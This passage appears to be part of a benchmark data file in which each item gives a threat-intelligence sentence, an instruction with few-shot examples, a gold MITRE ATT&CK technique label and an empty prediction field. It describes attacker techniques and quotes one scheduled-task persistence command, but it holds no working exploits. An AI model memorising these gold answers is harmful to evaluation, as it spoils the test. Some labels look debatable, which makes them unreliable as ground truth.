framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Maze has communicated to hard-coded IP addresses via HTTP.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: The Trojan does not encrypt the data sent via DNS beacons, rather it converts the ASCII characters into their hexadecimal values and includes these values in cleartext. The DNS beacons sent from the Helminth executable have the following structure, which is very similar to the script version\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: While the ports associated with this sample\u2019s configuration pertain normally to HTTP, HTTPS, or DNS, network communication takes place via raw sockets\n\t - T1095: Non-Application Layer Protocol\n\t - T1571: Non-Standard Port\n", + "input": "Sidewinder has used HTTP in C2 communications.", + "gold": "- T1071.001: Application Layer Protocol - Web Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Nonetheless, the infected DLL contains just one method (named DynamicRun), that can receive a C# script from a web request, compile it on the fly, and execute it\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: Egregor has used BITSadmin to download and execute malicious DLLs.\n\t - T1197: BITS Jobs\n- Text: 2) When contacted, the Google Drive link retrieves a zip file, which contains a .lnk file obfuscated as a .pdf file using the double extension trick. 3) This file requires the target to attempt to open the .lnk file, which redirects the user to a Windows Scripting Component (.wsc) file, hosted on an adversary-controlled microblogging page. MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs. 4) The .lnk file uses an embedded VBScript component to retrieve a decoy PDF file and a PowerShell script from the adversary-controlled web page\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n", + "input": "APT39 has used PowerShell to execute malicious code.", + "gold": "- T1059.001: Command and Scripting Interpreter - PowerShell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: DanBot has been distributed within a malicious Excel attachment via spearphishing emails.\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: During C0011, Transparent Tribe relied on a student target to open a malicious document delivered via email.\n\t - T1204.002: User Execution - Malicious File\n- Text: During C0011, Transparent Tribe sent emails containing a malicious link to student targets in India.\n\t - T1566.002: Phishing - Spearphishing Link\n", + "input": "Octopus has been delivered via spearsphishing emails.", + "gold": "- T1566.001: Phishing - Spearphishing Attachment", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ProLock can use .jpg and .bmp files to store its payload.\n\t - T1027.003: Obfuscated Files or Information - Steganography\n- Text: PlugX executes DLL hijacking with benign applications such as ESET antivirus, Adobe Update etc. Also, the PlugX that Mustang Panda APT uses has some extra features, including spreading through USB, gathering information, and stealing documents in air-gaped networks via USB\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: Gazer can establish persistence through the system screensaver by configuring it to execute the malware.\n\t - T1546.002: Event Triggered Execution - Screensaver\n", + "input": "BBK has the ability to use cmd to run a Portable Executable (PE) on the compromised host.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Egregor's payloads are custom-packed, archived and encrypted to prevent analysis.\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n- Text: The CARROTBAT malware family is a somewhat unique dropper and while it supports various types of decoy documents, and employs rudimentary command obfuscation, it should be made clear that it is not sophisticated\n\t - T1027: Obfuscated Files or Information\n- Text: Lazarus Group has used a custom hashing method to resolve APIs used in shellcode.\n\t - T1027.007: Obfuscated Files or Information - Dynamic API Resolution\n", + "input": "TrickBot leverages a custom packer to obfuscate its functionality.", + "gold": "- T1027.002: Obfuscated Files or Information - Software Packing", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Confucius has sent malicious links to victims through email campaigns.\n\t - T1566.002: Phishing - Spearphishing Link\n- Text: Chinese state-sponsored cyber actors have been observed conducting spearphishing campaigns that encourage engagement from the target audience. These emails may contain a malicious link or file that provide the cyber actor access to the victim\u2019s device after the user clicks on the malicious link or opens the attachment.\n\t - T1204.001: User Execution - Malicious Link\n\t - T1204.002: User Execution - Malicious File\n- Text: APT1 has sent spearphishing emails containing malicious attachments.\n\t - T1566.001: Phishing - Spearphishing Attachment\n", + "input": "Wizard Spider has sent phishing emails containing a link to an actor-controlled Google Drive document or other free online file hosting services.", + "gold": "- T1566.002: Phishing - Spearphishing Link", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Empire can capture webcam data on Windows and macOS systems.\n\t - T1125: Video Capture\n- Text: can record sound using input audio devices.\n\t - T1123: Audio Capture\n- Text: Dragonfly 2.0 has performed screen captures of victims, including by using a tool, scr.exe (which matched the hash of ScreenUtil).\n\t - T1113: Screen Capture\n", + "input": "Cobian RAT has a feature to access the webcam on the victim\u2019s machine.", + "gold": "- T1125: Video Capture", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: TRINITY malware used by identifies payment card track data on the victim and then copies it to a local file in a subdirectory of C:\\Windows\\. Once the malware collects the data, actors compressed data and moved it to another staging system before exfiltration.\n\t - T1074: Data Staged\n- Text: has built in commands to identify a host\u2019s IP address and find out other network configuration settings by viewing connected sessions.\n\t - T1016: System Network Configuration Discovery\n- Text: TRITON\u2019s TsLow python module pings controllers over the TriStation protocol.\n\t - T1018: Remote System Discovery\n", + "input": "Wizard Spider has used \u201csysteminfo\u201d and similar commands to acquire detailed configuration information of a victim machine.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Kimsuky has renamed malware to legitimate names such as \"ESTCommon.dll\" or \"patch.dll\".\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n- Text: The sample arrives as an app bundled in a Zip archive. It uses the icon for a Word document file as a disguise, attempting to pass itself off as a legitimate document file\n\t - T1036.004: Masquerading - Masquerade Task or Service\n- Text: APT32's macOS backdoor hides the clientID file via a chflags function.\n\t - T1564.001: Hide Artifacts - Hidden Files and Directories\n", + "input": "BackConfig has hidden malicious payloads in \"%USERPROFILE%\\Adobe\\Driver\\dwg\\\" and mimicked the legitimate DHCP service binary.", + "gold": "- T1036.005: Masquerading - Match Legitimate Name or Location", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT41 used \"cmd.exe /c\" to execute commands on remote machines.\nAPT41 used a batch file to install persistence for the Cobalt Strike BEACON loader.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: has used mshta.exe to execute VBScript to execute malicious code on victim systems.\n\t - T1218.005: System Binary Proxy Execution - Mshta\n- Text: Targets are sent spear phishing e-mails that lead them to a web site displaying a lure document and are immediately prompted to install a malicious Google Chrome extension. Once gaining a foothold, the threat actors use off-the-shelf tools to ensure persistence, including Remote Desktop Protocol (RDP) to maintain access. Figure 2: HTML Source of Phishing Page The malicious extensions, now removed from the Chrome Web Store, contain reviews left by the threat actor using compromised Google+ accounts. It should be noted however, that some users reported deleting the extension immediately because it prevented the Chrome browser from functioning properly. The malicious Chrome extensions declare permissions to run on every URL in the browser, as seen in Figure 3. Loading jQuery.js from an external site makes no sense, since the latest version of extension has a legitimate jQuery.js included in the extension bundle. Figure 4: Given the threat actor\u2019s propensity for password theft, and the fact that the malicious Chrome extensions were situated to read data from every website, it's likely that the intent is to steal browser cookies and passwords. A compromised or stolen certificate was used to sign several PE files used in STOLEN PENCIL for two sets of tools: - MECHANICAL Logs keystrokes to %userprofile%\\appdata\\roaming\\apach. Figure 5: Certificate used to sign MECHANICAL/GREASE While the threat actors did use a few tools to automate intrusions, we also found a ZIP archive of tools that demonstrate their propensity for password theft to propagate. Advise users to be wary of any prompts to install browser extensions, even if they are hosted on an official extension site\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n", + "input": "Egregor has used batch files for execution and can launch Internet Explorer from cmd.exe.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Impacket can be used to sniff network traffic via an interface or raw socket.\n\t - T1040: Network Sniffing\n- Text: FIN7 has used Kerberoasting for credential access and to enable lateral movement.\n\t - T1558.003: Steal or Forge Kerberos Tickets - Kerberoasting\n- Text: Steals Google Chrome and Apple Safari browser cookies from the victim\u2019s machine - Steals saved usernames and passwords in Chrome - Steals saved credit card credentials in Chrome - Steals iPhone\u2019s text messages if backed up to Mac - Steals cryptocurrency wallet data and keys - Keeps full control of the victim using the EmPyre backdoor - Mines cryptocurrency on the victim\u2019s machine\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n", + "input": "Stolen Pencil has a tool to sniff the network for passwords.", + "gold": "- T1040: Network Sniffing", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: achieves persistence by making an entry in the Registry's Run key.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: creates a Registry subkey to register its created service, and can also uninstall itself later by deleting this value. 's backdoor also enables remote attackers to modify and delete subkeys.\n\t - T1112: Modify Registry\n- Text: The loaded module is a simple dropper. Upon loading the module, the AutoOpen method will be invoked. The malicious code in this method drops the final payload executable into %AppData%\\service.exe and executes it (see Figure 6)\n\t - T1574.005: Hijack Execution Flow - Executable Installer File Permissions Weakness\n\t - T1574: Hijack Execution Flow\n\t - T1569.002: System Services - Service Execution\n\t - T1543.003: Create or Modify System Process - Windows Service\n", + "input": "Empire can modify the registry run keys \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" and \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" for persistence.", + "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: netbook or inexpensive laptop - Raspberry Pi computer - Bash Bunny, a special tool for carrying out USB attacks\n\t - T1200: Hardware Additions\n- Text: malware attempts to connect to Windows shares for lateral movement by using a generated list of usernames, which center around permutations of the username Administrator, and weak passwords.\n\t - T1110: Brute Force\n- Text: uses remote services such as VPN, Citrix, or OWA to persist in an environment.\n\t - T1133: External Remote Services\n", + "input": "DarkVishnya used Bash Bunny, Raspberry Pi, netbooks or inexpensive laptops to connect to the company\u2019s local network.", + "gold": "- T1200: Hardware Additions", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: A gh0st RAT variant has used DLL side-loading.\n\t - T1574.002: Hijack Execution Flow - DLL Side-Loading\n- Text: can load a DLL using the LoadLibrary API.\n\t - T1129: Shared Modules\n- Text: PS1 can inject its payload DLL Into memory.\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n", + "input": "GALLIUM used DLL side-loading to covertly load PoisonIvy into memory on the victim machine.", + "gold": "- T1574.002: Hijack Execution Flow - DLL Side-Loading", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has used a scheduled task for persistence.\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: If no exceptions occur, the Windows executable drops a DLL file in the user's AppData\\Local\\Temp\\ directory, creates a randomly-named folder under C:\\ProgramData\\ directory and moves the DLL under that folder as a random file name. This Redaman DLL is made persistent through a scheduled Windows task with the following properties\n\t - T1036.004: Masquerading - Masquerade Task or Service\n- Text: Earth Lusca used the command \"schtasks /Create /SC ONLOgon /TN WindowsUpdateCheck /TR \u201c[file path]\u201d /ru system\" for persistence.\n\t - T1053: Scheduled Task/Job\n", + "input": "During Frankenstein, the threat actors named a malicious scheduled task \"WinUpdate\" for persistence.", + "gold": "- T1036.004: Masquerading - Masquerade Task or Service", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Frankenstein has uploaded and downloaded files to utilize additional plugins.\n\t - T1105: Ingress Tool Transfer\n- Text: During Frankenstein, the threat actors used PowerShell to run a series of Base64-encoded commands that acted as a stager and enumerated hosts.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: Lazarus Group has conducted C2 over HTTP and HTTPS.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n", + "input": "KGH_SPY has the ability to download and execute code from remote servers.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Sykipot is known to contain functionality that enables targeting of smart card technologies to proxy authentication for connections to restricted network resources using detected hardware tokens.\n\t - T1111: Multi-Factor Authentication Interception\n- Text: BazarLoader is Windows-based malware spread through various methods involving email\n\t - T1588.001: Obtain Capabilities - Malware\n\t - T1587.001: Develop Capabilities - Malware\n\t - T1566.002: Phishing - Spearphishing Link\n\t - T1566.001: Phishing - Spearphishing Attachment\n\t - T1534: Internal Spearphishing\n\t - T1598.002: Phishing for Information - Spearphishing Attachment\n\t - T1566: Phishing\n- Text: Ursnif has used Tor for C2.\n\t - T1090.003: Proxy - Multi-hop Proxy\n", + "input": "During Operation Wocao, threat actors used a custom collection method to intercept two-factor authentication soft tokens.", + "gold": "- T1111: Multi-Factor Authentication Interception", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In what appears to be a first on the cyber-espionage scene, a nation-state-backed hacking group has used a Google Chrome extension to infect victims and steal passwords and cookies from their browsers\n\t - T1176: Browser Extensions\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- Text: The weaponized Office documents were found to be hosted either on what appeared to be compromised legitimate websites, or on websites using domain names similar to legitimate domain names in appearance\n\t - T1036: Masquerading\n\t - T1102: Web Service\n- Text: No matching sample found for T1608.006\n", + "input": "OSX/Shlayer can install malicious Safari browser extensions to serve ads.", + "gold": "- T1176: Browser Extensions", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Patchwork apparently altered NDiskMonitor samples by adding four bytes of random letters in a likely attempt to change the file hashes.\n\t - T1027.001: Obfuscated Files or Information - Binary Padding\n\t - T1027.005: Obfuscated Files or Information - Indicator Removal from Tools\n- Text: Turian can insert pseudo-random characters into its network encryption setup.\n\t - T1001.001: Data Obfuscation - Junk Data\n- Text: FunnyDream can send compressed and obfuscated packets to C2.\n\t - T1001: Data Obfuscation\n", + "input": "WastedLocker contains junk code to increase its entropy and hide the actual code.", + "gold": "- T1027.001: Obfuscated Files or Information - Binary Padding", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Valak can execute tasks via OLE.\n\t - T1559.002: Inter-Process Communication - Dynamic Data Exchange\n- Text: uses a PowerShell script to launch shellcode that retrieves an additional payload.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: The initial infection vector of this campaign is a Microsoft Office Excel Worksheet with an Office macro that uses the mshta.exe Windows executable to run scripts, which are embedded in the HTML of a specially-crafted blogspot.com page. The page, 29[.]html, contains two distinct sections of scripts. The scripts create scheduled tasks and also retrieve, decode, and execute a copy of Revenge RAT\n\t - T1218.005: System Binary Proxy Execution - Mshta\n", + "input": "MuddyWater has used malware that can execute PowerShell scripts via DDE.", + "gold": "- T1559.002: Inter-Process Communication - Dynamic Data Exchange", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: secretsdump.py: Performs various techniques to dump secrets from the remote machine without executing any agent there. For DIT files, we dump NTLM hashes, Plaintext credentials (if available) and Kerberos keys using the DL_DRSGetNCChanges() method. It can also dump NTDS.dit via vssadmin executed with the smbexec/wmiexec approach. mimikatz.py: Mini shell to control a remote mimikatz RPC server developed by @gentilkiwi\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n\t - T1003.003: OS Credential Dumping - NTDS\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n- Text: The malware tries to delete the shadow copies two times, once before crypting the files in the infected system and secondly after crypting them\n\t - T1490: Inhibit System Recovery\n- Text: APT39 used secure shell (SSH) to move laterally among their targets.\n\t - T1021.004: Remote Services - SSH\n", + "input": "Fox Kitten has used Volume Shadow Copy to access credential information from NTDS.", + "gold": "- T1003.003: OS Credential Dumping - NTDS", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Command_Update_Server: This command passes the string \u201cGh0st Update\u201d to the malware sample before running the sample again. When the sample restarts, it detects the \u201cGh0st Update\u201d command line arg, and connects to the server in order to update the sample. Command_Clean_Event: This command locates and deletes all of the event logs on the system\n\t - T1070.004: Indicator Removal - File Deletion\n\t - T1059: Command and Scripting Interpreter\n\t - T1070: Indicator Removal\n\t - T1102: Web Service\n- Text: Winnti Group has used a program named ff.exe to search for specific documents on compromised hosts.\n\t - T1083: File and Directory Discovery\n- Text: Kinsing has searched \"bash_history\" for credentials.\n\t - T1552.003: Unsecured Credentials - Bash History\n", + "input": "RTM can use the \"FindNextUrlCacheEntryA\" and \"FindFirstUrlCacheEntryA\" functions to search for specific strings within browser history.", + "gold": "- T1106: Native API", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SMOKEDHAM communicates with its C2 server using HTTPS. The backdoor uses domain fronting to obfuscate its true C2 server. The fronted domain is configured by an earlier stage of execution and the actual domain is hard-coded in the backdoor. Mandiant observed the fronted domain lumiahelptipsmscdnqa.microsoft[.]com and hard-coded domain max-ghoster1.azureedge[.]net used for C2 server communication\n\t - T1090.004: Proxy - Domain Fronting\n- Text: FIN4 has used Tor to log in to victims' email accounts.\n\t - T1090.003: Proxy - Multi-hop Proxy\n- Text: Fox Kitten has used the open source reverse proxy tools including FRPC and Go Proxy to establish connections from C2 to local servers.\n\t - T1090: Proxy\n", + "input": "meek uses Domain Fronting to disguise the destination of network traffic as another server that is hosted in the same Content Delivery Network (CDN) as the intended destination.", + "gold": "- T1090.004: Proxy - Domain Fronting", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: njRAT is capable of manipulating and deleting registry keys, including those used for persistence.\n\t - T1070.009: Indicator Removal - Clear Persistence\n- Text: Mosquito stores configuration values under the Registry key \"HKCU\\Software\\Microsoft\\[dllname]\" and modifies Registry keys under \"HKCR\\CLSID\\...\\InprocServer32\"with a path to the launcher.\n\t - T1112: Modify Registry\n- Text: It writes a file using two data structures: one associated with the file and other used for reading data from the C&C\n\t - T1070: Indicator Removal\n", + "input": "RTM can delete all Registry entries created during its execution.", + "gold": "- T1112: Modify Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cisco Talos has observed another malware campaign that utilizes malicious Microsoft Office documents (maldocs) to spread the remote access trojan (RAT) ObliqueRAT. This campaign targets organizations in South Asia. ObliqueRAT has been linked to the Transparent Tribe APT group in the past. This campaign hides the ObliqueRAT payload in seemingly benign image files hosted on compromised websites\n\t - T1204.001: User Execution - Malicious Link\n\t - T1204.002: User Execution - Malicious File\n- Text: ESTSecurity inspected a malicious lure document discussing North Korean defectors. This lure document contained a UPX packed binary that reached out to wave[.]posadadesantiago[.]com. Based upon their report we believe SHA256: 252d1b7a379f97fddd691880c1cf93eaeb2a5e5572e92a25240b75953c88736c, either is or is strikingly similar to the document discussed in their blog post based on these similarities\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: APT33 sent spear phishing emails to employees whose jobs related to the aviation industry. These emails included recruitment themed lures and contained links to malicious HTML application (.hta) files. The .hta files contained job descriptions and links to legitimate job postings on popular employment websites that would be relevant to the targeted individuals\n\t - T1566.002: Phishing - Spearphishing Link\n\t - T1204.001: User Execution - Malicious Link\n", + "input": "IndigoZebra sent spearphishing emails containing malicious attachments that urged recipients to review modifications in the file which would trigger the attack.", + "gold": "- T1204.002: User Execution - Malicious File", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a 